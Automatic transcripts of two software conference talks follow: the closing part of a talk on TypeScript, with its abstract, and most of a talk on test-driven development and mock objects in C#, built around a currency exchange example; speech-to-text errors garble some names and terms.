support in IDs and tools. It works best in Visual Studio right now, because it makes it and also makes the plugin. But you also get good support in Cloud9 and Sublime has a nice package that helps you compile and gives you syntax highlighting and some auto completion as well. So I think this is just an indication that there is many that invested time in TypeScript already, even though it's still a preview. And there have already appeared some community tools around TypeScript. We see, for instance, TypeScript definition package manager is a tool to download those definitions file like you do with Node package manager. So it actually worsens it and lets you easily update this if you want to. And web essential is a must have for Visual Studio if you are using Visual Studio. It allows you to configure how the compiler works and gives you some extra features with TypeScript. So I just want to give you a high-level overview of how TypeScript compares to TypeScript in Google Start just to know what the main difference is. Comparing it to TypeScript, we see that TypeScript has a much higher abstraction of JavaScript than what TypeScript has. Again, TypeScript is just a superset while TypeScript tries to lend style from both Ruby and Python. So we have more functional approach to developing JavaScript. And it's great for its purpose. And also it has much simpler class concept, but still it has this way of helping with encapsulation. But JavaScript in itself does not give you anything about help with file loading and dependency management. You've probably seen usage of Node in TypeScript that handles that. And Google Start. I haven't coded anything in Google Dart myself. But that's completely new language inspired by C syntax. So you can't just reuse your current skill set in JavaScript like you can with TypeScript. And it actually tries to solve many of JavaScript's inherent problems. But it gives you also many of the same constructs that you have already in TypeScript. But Dart has a lot more of them, language constructs. And there's a potential vendor lock-in. Again, you have this Dart VM, which is a part of Chrome that runs Dart without compiling into JavaScript. But you don't have to do that. You can also compile that to JavaScript. The resulting file is really big. And it also received some criticism from really, from Brendan Eich and Douglas Crockford, who are some notable characters in the JavaScript community. Brendan Eich actually created JavaScript. So that's just comparing it to those two. And one thing that's important to notice is that JavaScript is getting there. JavaScript will get classes, will get modules. It will get many of these modern features. But ECMAScript 6 is still a draft and it's not completed. And when that is completed, the implementation will start. And when the implementation starts, it will take some time for it to get implemented in all the modern browsers. And I have no idea how much time this will take, but unqualified guest is two to three years. And it will be really similar to what TypeScript is now, but TypeScript will have types and some more. So JavaScript is still a subset of TypeScript when it's done or released. So TypeScript is, like I said, it's still a preview. It's not finished. But there has recently been released a new version for preview that actually has generics and some performance tweaks. And adding generics is a really cool feature. So you can actually implement the link, language in the great query in TypeScript. So I don't know if anyone has started that, but it's an interesting feature to have in that language. And for when the language is completed, there is a plan to add async and await support, sharp keywords. And I think that is a really, really cool thing to add to this language. Because right now we are doing callbacks and we can actually just use the async keyword or await keyword in order to do this the same way as we do in C sharp 5. For those of you who have tried it, I think that will make the code easier to read and more easy to follow. And it will also add mix-ins to language. That's an interesting feature that the, because JavaScript is dynamic language, you can actually do mix-ins. And having that in TypeScript as well is really useful. So I promised you, I'll tell you about where the dragons are. But there are not many and they're not that severe. One thing to be aware of is using TypeScript or trying to use TypeScript in existing JavaScript frameworks like Angular. Angular actually tries to solve many of the problems that, or tries to make it easier to create JavaScript application. And it is designed entirely for JavaScript. And many of the things it tries to solve is not necessary to solve in TypeScript. So, and this is not just an Angular problem, but some frameworks might be difficult to use in TypeScript. So be aware of this. Don't try to use, for instance, one of the problems with Angular is that it's based on functions and functional design. And you don't need to need that in a TypeScript application. There are other ways of solving this. So a tip might be looking for a dedicated TypeScript framework that works better. So another thing is that there's a lot of syntactical shortcuts that you can use. But I'm pretty sure that you will end up with really messy code that's unreadable if you use this without caution. Especially you can actually do inline Type specification of interfaces. That means that you can actually, instead of creating an interface outside, in another place in the code, you can just write the interface declaration then and there. And you have, and you can also nest the modules that you're declaring really deeply and try to avoid that. And when using arrow functions, you can also, again, you can make these two complex for it to be readable. Again, it's still a preview. There are bugs in TypeScript, especially around when you use the property get and get and set properties. There are some known bugs there. And protected accessibility is not implemented yet. It's planned in a future release. So if you do subclassing, you don't have the keyword protect to make a field available to your children. And there are still features that need improvement. For instance, modules and the way you import modules need some improvement just on syntactical sugar in order to ease up how this is done. So I'm going to just look back at what we have been through. We've seen that we learn what TypeScript is. We have taken a deep dive into all the new features, almost important features. We have looked at how we can actually do dependency management in real world application, and compare it to some languages. And we see what's happening right now with both JavaScript and TypeScript. And what we can take out of this is that by having a compiler, you can actually eliminate a lot of bugs that you usually would find around time with JavaScript. You get strong typing and thereby strong tooling in your IDEs. So it makes it easier to refactor, you can actually refactor TypeScript code in your ID. You get more encapsulation, and you have mechanisms to simplify dependency management and, again, ID support. And it actually also lowers the threshold for beginning with JavaScript. So I personally think that the threshold for a developer that has not done JavaScript development is quite high right now if you wanted to start with JavaScript. But working with TypeScript, I think that might be a bit easier because you have constructs from object-oriented programming. So it will be a lot of pressure. You can reuse more of your existing knowledge. There are a few advantages for large-scale applications. You can actually build more robust apps. You have a strong typing that helps you and ensure that you have correctness throughout your application, at least when it comes to the typing. An interesting case, I experienced once, we were free developers working on a codebase, and we had interfaces for different commands we sent to the server. And at one time, one of us changed added a new field to this interface. And what happened then? We had three builders, and then we could actually find the three places in our codebase that we needed to update in order to conform to this new interface. So that was just an example of how you can get more robustness out of using typing. And you can also enforce design. You can actually do design patterns now, more easily at least. I don't know if it makes sense in TypeScript, but at least you have the mechanisms to drive the design. So you, as a... If you are developing a framework, you can actually make it really easy to use that framework for other developers. And you get more maintainable apps. This is probably what the enterprises want. They want something that is maintainable. I think JavaScript is... Might be a difficult technology to choose if you're enterprise and want to... And you don't have JavaScript resources. So this makes it easier. And you, again, it might be easier to train or get developers that know TypeScript or object-oriented design. And for small scale apps, it's not that much to gain on using TypeScript, but you get a simplified build process. If you're using Visual Studio, just compile when you save. You get less bootstrapping. You don't have to do as much to get your application up and running. You can just use the internal module references and things will work. And I think probably the biggest win is the strong tooling where you get autocomplete help in your IDE. And I think that's actually one of the things I've liked the most. So that was actually... I want more thing I can actually show you. Just for a little wow effect here. So this is the first time I actually used a GIF in a presentation. Do you like it? All right. I will now have to see if I have a file for this. All right. I'll actually create a new file for this. So add... Again, I have to switch here. All right. I'm going to scroll down to add a new TypeScript file here. And the setting I'm in right now is that I'm creating a Twitter application. So what I'm doing, I'm going to create something that gets a list of tweets or the timeline from Twitter. And if I were to do this with strong typing, I would have to go into the documentation. So I could go here and read the documentation for that query. So here all the parameters are described. And I would have to copy them into... Make interfaces out of this manually. But there is a cool little trick you can do. So if I just copy this one, which is one of the parts. And this is just a JSON file, not just a JSON code. So I have this feature in a web potential called paste JSON as classes. So if I do that, like so. I have to ensure that I haven't get... I have to take more or less of this. Again, wow effect. No, it's without them, I think. Yeah, it's without them. It's supposed to work like so. There we go. So what we see now is this is the... I can actually just call this the timeline. So what I have now, now I have a strongly typed type for entire return object here. So it has created it. So small modifications I can actually now have strong types. So if I were to have a jQuery function that looks something like this. So if I had something like.get timeline and in the call box I get this data, I can say that this data is of type... time... Twitter timeline. So now actually in the response, I could actually code knowing which fields were present in this. I don't know if this works. Yeah, so I can actually navigate the return structure here. So I think that's one of the cool features. So that was what I wanted to show you today. So are there any questions? I will be putting this presentation up on slide deck later. So if you want to... why don't it fix my presentation? Yeah, the cable here is a bit loose. Yeah, you probably managed to read that, right? So I don't know why it's not switching over to... try this. Let me do like so. Okay, you can reach me at Twitter. For instance, I'm going to post the links to the slides on Twitter afterwards. And if you want to see the code, I can probably put it up in GitHub. So the last thing I want to say, remember to vote outside using this, hopefully this green one. So thank you for your attention today and have a good conference.
|
There have been several attempts at patching static typing into JavaScript, but none have had notable success. TypeScript is different. Aligning with the EcmaScript 6 standard, it is a simple superset of JavaScript that’s easy and intuitive to learn — especially for those who know JavaScript. In this talk you will learn what TypeScript is, what’s new, how it differs from JavaScript, what to be aware of and where I think TypeScript is heading. TypeScript’s static typing opens up a whole new dimension for large-scale applications. It enables language analysis, gives type safety, refactoring support in IDEs as well as other features that are hard to achieve in JavaScript. Additionally, typing is optional, so you can add typing step by step in your existing application. This presentation will be loaded with code examples. I will give a quick comparison to some related languages like Dart and CoffeeScript, just to show you the difference and explain when TypeScript might be a safer bet. I have looked extensively into TypeScript and used it in production code. Come get the distilled version of what you need to know!
|
10.5446/51527 (DOI)
|
session on succeeding with TDD, pragmatic technique for effective mocking. My name is Venkat Subramanyam. I'm going to just talk maybe about for about five minutes, a little bit more maybe, and then we'll get into code and rest of the time we'll take a look at an example and then drive it through Test-Triven Development and mock objects. Best time to ask a question or make a comment is when you have it, so please don't wait till the end. Anytime is a great time for questions or comments, please don't hesitate. So talk a little bit about benefits of unit testing. I won't spend too much time on this topic, but just to quickly highlight why we want to do these things. The two things that I really like about Test-Triven Development is the two clear benefits in my eyes are one is regression. You want to make sure that the code that you wrote once continues to work as you evolve and modify the design. The second benefit of TDD, which takes a little bit more effort, okay, a lot more effort, is to make sure that our design is actually practical, design is lightweight. So Test-Triven Development can benefit by creating or help us to create a better quality design, but that doesn't come too naturally at least for me. It requires a little bit of effort in getting that. But the regression aspect definitely is there. As we evolve the design, it definitely gives a feedback to say that the code actually not only worked before but continues to work. In a lot of ways, it gives us an ability to do fearless evolution of code because within a short span of time, it gives a rapid feedback that the code actually is working as well. That has definite benefits. Now, of course, when it comes to unit testing code, unit testing is very easy when the code we are trying to test is independent or isolated. If you have a little code that does a formula calculation, a mathematical operation, currency conversion, what have you, you may say this is easy to do because it doesn't have any dependencies on other things once all the information it needs is given to it. So it's very easy to unit test code that has no dependencies. Unit testing code that depends on other code becomes incredibly difficult. What if you have a piece of code that has to talk to a database, a piece of code that has to talk to a remote server, a piece of code that requires authentication to something before it can get the data, a piece of code that has to process credit card and then based on that has to do other operations, all these code can become very difficult to unit test. It becomes brittle because we also have these dependencies. Not only can it become slow, and oftentimes how do we solve the problem? We quietly say this code is not testable. Well, one of the things I've realized over time is when somebody tells us this code is not testable, that is actually a euphemism. What they are trying to tell you is the design of the code actually sucks. So if a code is designed fairly well, we can actually test it. So it's important for us to be able to write code and design code in a way we can actually test it. But how do we go about really writing these kinds of code where it can be tested? Now, this is where mock objects can help us. But before I talk about mock objects, I want to emphasize one thing. I don't want to kind of mislead people to say mock objects are great and use them. That's not what I'm saying. Mock objects can come to our rescue, but we have to be very careful using them. In this entire presentation, I'm going to focus on using mock objects, but I don't want to carry you towards saying, oh, great, use them all the time. That's certainly not what I'm saying. Be very sparing in using mock objects as well because I've seen projects where mock objects become really difficult and they get into this mode called a mocking hell and it becomes really hard to maintain code after that as well. So be very sparing, be very cautious in using them. So what are mock objects really? Mock objects are objects that can stand in for other objects. So let's say for a minute, I want to make a good movie with the famous actor. Obviously, it's going to be expensive to set up the stage with this actor on stage. So we'll probably walk around the street, find a guy about the same height and weight and say, hey, would you like to come and stand in and you have an opportunity to look at the famous actor at the end of the day? So this person, of course, comes and stands and helps you set up the stage. And obviously, this person is not as good as the famous actor is. Otherwise, you would be paying big bucks for this guy to come and stand in as well, isn't it? So the point really is that it is a stand-in, something that comes in, stands in for a real object. There are some seats available here as well, but if you're more comfortable sitting, that's perfectly fine. I'm not saying you shouldn't. I a lot of times sit and I don't even wear shoes, as you can see. So make yourself comfortable anyway you want to, but there are seats available here. So the real idea is to stand in for real objects so that we can accelerate testing. Now I don't want to spend too much time on this topic either, but I do want to draw a quick distinction between stubs and mocks, mainly because we face these kinds of concerns. But the difference between a stub and mock as I see it is modern follower describes this fairly well. He talks about a stub represents a state for testing purpose, a mock represents a behavior for testing purpose. So the real idea is if you're really interested in the object, just standing in for another object, a stub is quite enough. But a mock object as I see it, tattles tails to you. It says, let me tell you what really happened. Here are the methods that were called. Here are the number of times the method were called. So it gives you a lot more detail. Now having said this distinction, invariably, I don't get too pedantic about it. Yes, there are differences between stubs and mocks, but I really don't care. So most of the time I use the word mock very loosely and there are times when I really am using a stub and I use the word mock. I don't want to be sitting there and thinking too much about it and things kind of fall in place most of the time. So when you hear me use, say, the word mock, it could be a stub sometimes, it could be a mock at other times, but it really doesn't matter most of the time as long as we kind of know the difference within our own context. So how do these mock objects really help? There are two ways in which mock objects help. The first way mock objects help is they stand in for good behavior. For example, let's say I want to process my order and I need to talk to a credit card system. I don't want to talk to a real credit card system because of all the complexities involved in it. So I will put a mock object in place and say, for any request that comes in, simply approve these requests and it can simply respond back with an approval. And I can run my test very quickly with this mock object. But more important, a mock object is also very helpful to stand in for bad behaviors as well. For example, what are the possible things that could go wrong when I try to communicate with a remote system that is going to process my credit card? Well, what is it that cannot go wrong, right? Any time you turn around the corner, there's Murphy sitting there saying, here are things that could go wrong. So, but how do you know that your program handles these properly? Well, you can set up a mock object to start failing in a very predictable way so that you can make sure your code is handling these failure situations. So when your code does talk to a real system, those failures can be gracefully handled. So a mock object can pretend about bad behavior that you may expect as well in a very deterministic manner as well. And that becomes very helpful. That's all I'm going to talk about for most part. But I think the real fun is really trying things out. So for the rest of the session, I'm going to try out an example and I'm going to create a little sample code, play with it, let's start somewhere and see what we can do. So I'm going to use an exercise, a sample exercise to create and play with it. And I've been struggling with this for a while with various tools and techniques, but I also ran into something, you know, that is kind of interesting in Visual Studio 2012, which is the Fakes library, which really gives a very interesting way to mock out things. I've used RhinoMock quite a bit in the past. I really like RhinoMock, but there are times when I kind of hit a few limits on RhinoMock as well. But Fakes seems to really bring enormous power on our hand. But of course, remember the wise words of Uncle Ben, with great power comes great responsibility. So we've got to use it wisely as well. But let's take a look at how we could use it as well with an example. So here's an exercise that I would like to start with. In this exercise, what I want is, I want to implement a currency exchange object. So fairly simple to this currency exchange object, I'm going to give a name of a currency. And I want to know how many US dollars I'm going to get back from this currency. Well, in order to do this, of course, my service provider here is running the business where they want to communicate with other providers really, and then find who offers the best rate, and then mark down the price by 2% to get a profit, and then return back the remaining money. So this code is going to go to a service and say, hey, vendor one, what kind of currency rate can you give for me? And they say I can offer you a $5.22, for example, or five chronos and 22 cents. And then I ask for vendor two, well, that happens to give an error today. And then I ask for vendor, so I love the error information. I ask for vendor three, it gives me a rate. I mark it down by 2% and return back the vendor three and whatever the value is. So this is what I want to implement. Very simple example, but there are some challenges already. There is a little bit of math I have to do, but I also have to talk to a web service which is out there somewhere on the web, and assuming I'm connected to the web, I should be able to connect to it as well at the very end, hopefully, and we can see it. But how do I go about designing this code? So I'm going to take a test-driven approach to design this and keep a check on me. I should not write any code until I have a test failing, and I'm going to write a test after that, and then we'll slowly introduce it. So I'm going to go through a series of steps to make this example work, and when we are done with it, I'm hoping we'll have the scenario working where we'll go to the web service to talk to various different objects. If there's an error, we'll log it to a file, an error's file, and then we'll return back a good response to the user saying, here's a vendor that I'm going to provide for you, and here's the mark down price after we took the profit away from the cost that we're going to give it to you. Seems reasonable so far. All right, let's go ahead and start with something. Where do I start? I normally want to start with what's called a Canary test. What's a Canary test? A Canary test is a little test to make sure things are actually set up on the machine. I work with a lot of different companies. I work on projects, and when I go over there, I find that a lot of times, tools are not set up properly, and a Canary test is a good way to make sure things are set up. It's a stupid test, you say, assert true is true. I mean, how stupid it could get beyond that. And if assert true is true, actually fails, you know you're going to have a very long day trying to fix the system, right? And then you can have people come over and take a look at it, and you say, this is not working. Can you help me set up the system? And they will ask you, what are you doing? And you show them the code, and they say, that's stupid. Yeah, please help me make that work really, right? So you're not writing 50 lines of code and then messing with it. So let's start with the little Canary test to begin with. So all I have here is a test class called currency exchange test, that's the name of the class, and I want to write a test over here. So test, I'm going to write a test method right here. I'll call it a Canary test. And all I'm going to do in the Canary test as I promised is I'm going to simply say assert true is true, as simple as that. And I'm going to go ahead and run my test right now, and see if the test wants to run, it's building the test at this point. And of course, this test, if everything goes well, should pass, and it should tell me that the Canary test is passing. And so right there is the Canary test. Today is my lucky day. You can hear the Canary sing. Well, the term Canary test comes from this little phrase that, Canary in a coal mine, so the miners take this little bird, Canary, in a little cage, and they go into the mines. And of course, as they are working in the mine, sometimes there could be a bad fume, which is dangerous to the health. The Canary keeps singing all day long. And if it smells this fume, it dies. This is very good for the miners, not so much for the Canary, unfortunately. But it gives a quick feedback cycle. That's what we are doing here is a little Canary test. So it looks like my environment is set up properly. I'm using Visual Studio 2012 here, not a whole lot. I have this test class called a currency exchange test. It's in a separate test library, by the way. I also have this other file here called currency exchange, which is in its own libraries. I have two separate libraries here. One is the test library, and the other is a normal dot net class library. That's all I have on my hand at this point. Okay, great so far. What's the next thing I want to do? Well, I want to implement the simplest case. I want to implement a markdown. So let's go ahead and write a test for a markdown. So what I'm going to do here is simply say I want to write a test for markdown. So we'll call markdown over here. Now, this should be fairly simple to get going. So what am I going to do within the markdown itself? I'm going to give a little space here so it kind of stays in the middle. All right, so I'm going to create a currency exchange over here. So currency exchange is my object. And in this case, I'm going to say currency exchange and equals new, let's say currency exchange object. And of course, the studio should complain to us that it doesn't have a clue what currency exchange is. We can quickly fix that. Let's go here and add a reference to this. So I'm going to go to my test library, add a reference. It should be in the solutions to the project itself right there. I select that right now, and that's all I'm doing. I'm bringing that back over here. So that should be enough for our purposes. So let's go ahead and bring it. So in this case, of course, I added the library. So let me go ahead and ask him to bring in the using for it. So that should please the compiler. So now I'm going to simply say currency exchange dot. I'll call markdown. So markdown is going to simply accept some value of currency. And of course, I want to make sure this is giving back the right result. So we'll say are equal. And of course, 2% is taken away. So that should be 98 out of the 100 that I'm interested in receiving back. So let's go ahead and implement the markdown method. Of course, the test is failing already. You can see the compiler didn't even like that code. So let's go ahead and make that test pass. So I'm going to go ahead and implement this markdown. I'm going to take an amount as a parameter. In this case, I'm going to simply return. And let's go ahead and return amount times 0.2% 98% rather, isn't it? So 0.98. And that should take care of it. Of course, you may argue, dude, don't you want to just return the value itself and then write more tests to do it? Absolutely, we could do it. But I want to move on to other important tests to work on. So I'll kind of bypass those steps right here. So our markdown is working as well. So that's a good news. So it's time for us to get to a more interesting test at this point. What about getting the rate for a currency itself? Now, what if there are no vendors? So notice that I want to start from very small steps. I always contend, you know, confront with this, what am I really doing in test and development? I spend a lot of time talking to programmers because we learn a great deal when we talk to each other. So in one of the discussions, I was asking, how do we really approach test and development? And what I heard was something that intrigued me. TDD is an approach where we go from a set of unknowns to a state of known. And I thought that was a really nice way to think about it. But the way I want to emphasize that a little bit more is, I want to go from a state of unknown to a state of known, but only looking at one small unknown at a time in manageable pieces. So that really makes a nice path for us to walk through and build on what's working already. So I start with a no vendors to begin with because I want to say I don't have any vendors at all. That's easy to write, not a whole lot of code to write, and I can get the interface set up. Why go through these little steps? The reason why I like to go through these little steps is the very first few steps really helped me to build the interface of a class. And then as more tests are written, it starts forming the guts of the code itself. So we go from the outer skin of the interface to the inner implementation by going through this approach. So I tend to really take this approach to develop it. So I want to write for a no vendors. So I'm going to write a little test here that's going to be for a rate given no vendors, let's say vendors, and how do I implement this rate given no vendors over here? So let's go ahead and say again a currency exchange. I'm going to create an object of this currency exchange. So in this case, of course, I'm going to say the currency exchange is going to have a method called get rate, let's say. So get rate is going to take the currency I'm interested in. We are assuming for a dollar of rate that we are interested in giving here. And what is this going to give me? I'm going to simply say double, let's say, rate equals, and it gives me a rate value. But I want to assert and get whatever the value of the rate is. So I'm going to say r equals 2. But remember from our problem description, we had two things coming back, the vendor name and also the rate itself. So we need to take care of that. So I'm going to say var rate over here. But what is the rate going to be? Well, I want the rate to be something that I would expect to be reasonable. But as a web service, as a service that relies on web services, what is a good response I have to give? Well, it makes absolutely no sense to complain to the user that the web sucks and the server is down because the user cares less. So one way you can really convince the user not to do business with you today is you can say, I'll take all your money and give you back nothing. Right? That will be very clear message if something is totally wrong. So I'm going to simply return back over here a rate value I'm going to expect. So I'm going to say expected equals. And of course, all that I have to verify here is that the rate I got back is expected. But what is this expected value, by the way, the expected is going to be just a couple by the way and the couple of a string and a double value. And in this case, all that I would like to give to it is a no vendor name and a 0.0 value given to it. And that should be quite adequate for our purposes right now. So this kind of defines the interface of this function taking a rate, get rate function which takes a string, which is a currency name returns back a couple of these values. Let's go ahead and implement this function by the way. So I'm going to go ahead and ask him to generate the step for me. If I go back over here, it has the get rate method which I want to return a couple of a string and a double value as you can see here. And then of course, in this case, I'm going to say currency, which is what I want to send to it. And this is going to be a fairly simple implementation at this point will simply return new couple. And this is going to be an empty name and a 0.0 as a value. And that is all I need to really return and we can see that test is really passing. So we implemented the interface for this with no vendors and we defined what it should do when no vendors are given. The next step here is to implement for one vendor. So we're kind of gradually adding the complexity. What if I do have one vendor? How do I want this to implement? Remember the problem on hand one more time. When there is a vendor, I have to go talk to the web service. But I don't want to talk to the web service at this time. And the reason simply is because I want to keep my focus on my logic I'm implementing. I don't want to worry about the web service at this point. I kind of know what the web service should do for me. I don't care to know how it is going to be. I'm going to communicate with it at this moment. So we can gradually move again from a series of unknown to one unknown solving one unknown at a time and then going towards knowns. So what am I going to do to avoid that particular concern? So to avoid that concern, I'm going to go ahead and create an interface because how do we really deal with dependencies? Well, one way to deal with dependency is to eliminate it. By the way, that's a very important thing to consider. A very important design decision is not to invert dependency but to eliminate it wherever possible. Because the more dependency we deal with, it's a pain. But it depends on things that we cannot eliminate. We can invert the dependency by throwing in an interface and of course an interface stands in really nicely and then we can then implement it the way we want to implement it. So how do we go about implementing this? So let's go ahead and write our test case first. So in this case I'm going to say the test I want to write here is a rate given one vendor. Well, how do I implement for a one vendor? So I'm going to go ahead and introduce the currency exchange one more time here. You could argue that we could use a setup method and remove dependence duplication of this. Fair enough but I'm not going to go that direction right now because that's not going to help us go in the direction I want to go. So I'll kind of avoid that for now. So I'm going to say expected equals new tuple one more time and in this case it is going to be a string and a double as well. But this time I'm going to say vendor one is the vendor we selected and I want this amount to be a 98, you know, a unit of currency. So that is my expected and I'm going to say rate equals currency exchange dot get rate one more time and in this case of course I would like to get the rate value asserted so we'll say assert R equal one more time and then expected and then rate that I'm expecting back. But looking at this test how in the world do I know that this is going to be a result of vendor one and the value of 98? So we got to do a little bit more preparation for this. So I'm going to say currency exchange dot and in this case of course I have to set up the details for the currency exchange. So I'll say set vendors over here and in this case of course I'm going to pass to him the vendor one itself that I want to pass in and say I want to tell you that I have one vendor available to me but go ahead and find me the results for me. So given this value but still how does it know that the value should be a 98? We haven't given that detail to it yet. So the idea really is this. We want to go to this object that we are testing right now, ask him to give a price. He knows that there is a vendor one. He's going to go to the web service and say hey I'm going to give you a vendor one, can you give me the price back to me? So to make this code testable we want to mock out the service that we have on our hand at this time. So how do I mock out the service? Well to mock out the service all that I have to do is simply write a little implementation that says given this vendor name just simply return back a price of 100 and then as you mark it down by 2% you get back a 98. So we can easily work through that very well in this case. So to do this I need a mock object but let's wait a little bit before we can introduce that mock object over here. So to make that happen I'm going to introduce a i vendor service over here and I'm going to call it vendor service right here and this vendor service I'm going to implement this in just a minute so I'll just leave it as a null for a second and I'm going to say this is a vendor service by the way that I want to pass to the constructor. So we are using this dependency injection through constructor. There are about three ways to introduce dependencies well maybe more than three ways but one is to introduce it through a constructor. The second way to introduce that would be using a setter and a method on the class. A third way probably is to use a factory under the hood where you call the method you are interested in that calls into a factory and the factory will give you the instance you are requiring. This is where other approaches like you know spring and so on comes in for injecting the dependencies. So in this case I'm going to do a very simple constructor based injection but in order to do this I need a vendor service by the way but where is this vendor service. Well it's pretty easy I'll go into the library code and I'll go ahead and add in this case and I will simply add an interface that I want to create in this case and this is going to be called a vendor service. Oops it's going to be I vendor service so I vendor service is what I want to create and I want this to be an interface in this case. Let's even make that a public interface. We can come back to the methods of it a little later. No rush to work with it. So that is the interface I just added right here and I'm passing it to this particular class. Of course for this to work I need a constructor that takes this particular argument so let's go ahead and add it. We'll create one constructor which doesn't take any parameters because we used that in the previous test cases. We'll create yet another constructor where this constructor takes a vendor service and I'll just say service here and I'm going to simply assign it to a vendor service equal service right here. Well this vendor service is going to be just a field I want to create in the class so right there is the field I've created to hold the vendor service itself. Now let's get back to the test itself and see what we're going to do here. Well we are good so far I need the set vendor service method. Let's go ahead and implement that method and now to get to this point what about this vendor service I need to implement it. Well that's going to be a little mock object so I'm going to be lazy and create it right here and I'll call it as mock vendor service and this mock vendor service simply implements the vendor service itself and we'll come back to look at what it should do a little bit later. So I got this vendor service and I'm going to simply say new mock vendor service and create an instance of it. So we have the code in place so far we have created a mock object for the vendor service and we have told him that I want to use that object here and we are passing the vendors to this class and using it so we have to go back and implement this method properly for it to work. So let's go ahead and create a vendor for a minute we'll call it a vendor and in this case I'm going to create a vendor and this let this be just an empty string for a minute actually it's leave it as a null for a minute and then of course in the code I need to tell him to use the vendor service where do I set it. In the set vendors method let's go ahead and set the vendor so I'll say vendor equals the given vendor itself so I'll just take one vendor for now and on this case of course I have to use this vendor in my code so how would I use this vendor itself so right there is the string vendor and I've assigned the vendor over here much here why he's complete oh there we go my eyes are fooling me and of course I have to use this so what am I going to do in the method get rate well that's fairly simple so I'm going to first of all create a rate over here and I'm going to simply return this rate value so we'll simply say return rate but in between we will say if the vendor is not equal to a null then I'm going to go ahead and use this vendor so to get the rate itself but the vendor service by the way is the mock object so we can readily use that as in it so I'm going to say here amount equals mark down on the given amount but where is the end value itself in the vendor service and I'll call a get rate for vendor which doesn't exist right now and we give them a vendor name and then we also give them the currency name as well so we are slowly defining the behavior we expect of the interface which will be implemented by our mock object now you may argue don't you have to know what the real service you're going to depend on provided sure we do but it also only matters if it serves our purposes so we'll kind of drive it from our need and then map it over to what it provides when we get to that point so in this case I have a get rate for vendor and we have to implement it but once this is done my next task would be to create the rate itself in the format we are interested in so new tuple over here and then this case I will say this is the vendor name and then the amount is the rate itself that we want to pass out so this requires us to implement the get rate method which is fairly simple to implement because it just becomes a method on the interface itself so that is pretty adequate for our purpose so we are almost there to get this running so what is going on at this point well we have the rate value sitting up here and we want to create a new rate over here and then set the rate value oh let's make sure this is returning the proper value in this case so let's get to this method the vendor rate itself because I think I messed up the return type of this there we go actually I didn't so it's a double this is going to be a currency that's okay so let's see what the error here tells us so the tuple string and double the vendor is good and the amount is going to be double so he is not happy with the string and double here do you see the problem here I don't see the problem we'll see we'll see if he complains a little bit more sorry what was that oh of course markdown what does it do markdown returns I didn't notice that oh how bad that is double of course yeah so let's go back to this and see if that's satisfying him so markdown is going to return double still he says invalid argument let's make this double here and then this is going to be a string which is a vendor so let's go ahead and try this so let's see it does not implement the interface yes okay finally we are getting the right error we should be getting in the test method itself so in the test what are we having problem with in the test we have this interface we need to implement this finally so to implement this interface we'll ask him to provide an implementation for the get rate method all that we have to do is simply return a hundred after all here that should be quite sufficient for our purposes so we have the test for one vendor working now and what did we do so far we created an mock object we kind of avoided the service at this point conveniently and then we said given this particular mock object which simply returns a hundred in this test we are going to go asking for a price for the vendor one and we have told the class there's vendor one available and the get rate returns a hundred I'm sorry get rate goes to this guy and gets a hundred marks are done by two and we got a ninety eight that we are returning so our first test is good but we are ready to really think about what if the service actually fails because when you're sending a request to the service something could really go miserably wrong and starts failing well the problem is the service may have different kinds of errors it may give a blank result some garbage at some time what have you a server error how do we deal with it so what I'm going to do here let's go ahead and copy this for a minute and start changing this to give an error situation so rate given one vendor and service gives error let's say how do I deal with that well if I start with this when the service itself fails we are back to square one because I don't have a so I only have one vendor available even that vendor failed so my result is going to be an empty string and a zero point zero because a user doesn't care that it went wrong I care about it right so vendor one is given and I'm going to go as for the rate when I run this little example of course the test should fail right now when it did fail and if you look at why it failed you will notice the reason for the failure here is that we were expecting an empty and a zero but the result was a vendor one and ninety eight so that clearly tells us that that we are not really processing the error in this case but where did we even tell him this will go wrong well obviously our mock was nicely returning a hundred so we got to tell our mock to return an error how do we go about telling our mock to return an error well if I go back to this mock and say a throw new let's say throw new application exception over here and in this case I'm going to say simulated exception and I could go ahead and remove this return hundred for a minute if I do this let's say what's going to happen well both the test actually fail why is the other test failing obviously because we have to return a hundred and not throw an exception so now we are in a little bit of a pickle isn't it how do we deal with this any ideas as one one suggestion you're absolutely right before we go that I'm sure we are all tempted by this right why don't we make this mock throw an exception in one condition and return a result in another condition anybody has tried that before absolutely right one brave one raising the hand over there absolutely we all have tried it a few more people raising the hand that's okay among friends nobody's going to blame you for that right so we all have done that now what will happen if we do that how do we tell him to throw an exception in one case and then return a value in another well we got to probably put a little conditional flag in there and then we'll tell him here's a conditional flag and then we will come over here and say bully and throw exception or don't throw exception so our test our mark grow a little bit bigger right now then we go to another test and that test wants a little bit more so what do we end up doing we slowly start putting a little bit and little bit more into this mark and one morning you come to work and suddenly this mark has grown and taken a shape in front of you and you're a little kind of worried about it you sit a little away from it and say that kind of has grown really scary isn't it it started really small and benign and then you know that you've really gone over when one of your colleague comes to you and says I got a question for you do we need to do we need to write unit test for the mock right that's when you know you have really gone overboard with this right so the model of the story is this never make a mock more complex I was actually teaching a course a couple of years ago and and when I started teaching about mock objects one guy said I've been using mock objects for a few years and I hate them I said that's very motivating thank you for setting up the stage for the session but we'll talk about it when I'm done with it right as it was in the middle of the session he raised his hand again and said I know why I now hate mock objects because I always took a mock object and started growing them and over time it becomes overly complex so the first thing to avoid doing is don't create one mock object for an object so what do we do then if you think about an object you are standing in for you want one mock object for one satisfying one test you want another mock object for satisfying another test and yet another mock object or satisfying yet another test and so on entertain the thought for a minute it also leads to a few more concerns but we'll come back to that so what I'm going to do to avoid this problem is let's get back to running this test one more time and the other test is still passing that is good we don't want to break an existing test so I'm going to say here we'll call it as a mock vendor service that blows up right so a mock vendor service that blows up is what I want to call here so how would I create this mock vendor service that blows up so here is my code I'm going to say class mock vendor service that blows up inherits from i vendor service again and in this case of course I'm going to go ahead and implement this method but in this method I'm going to simply say throw application exception and I'm going to simply say simulated exception over here so let's go ahead and say that exception well that's great so far but there is one small problem in this case well in order for this to work properly of course we got to modify our method so I'm going to go to our method itself and say well here we are if I'm going to go ahead and try accessing this by the way and if this was giving an exception catch exception so we'll say exception because it's going to fail at some point if it does fail with an exception in this case I'm going to simply just skip it we'll worry about what to do remember our requirement is we have to log errors where we're not ready to write that right now we'll just put a skip here for now and move on so let's go ahead and run the test one more time and see what it does and we can see our test is passing so we got to that point right now but we solved a problem but we introduced another problem at this point now when I program in Java by the way I program in multiple different languages when I program in Java what I normally do is I use anonymous inner classes so within my test itself I would create these mock objects so they're kind of close to each other well C sharp doesn't quite give us that kind of flexibility and so we are kind of tempted to put this class outside but the biggest pain I see going this approach is that when we do this we're going to be creating several mock classes now nobody 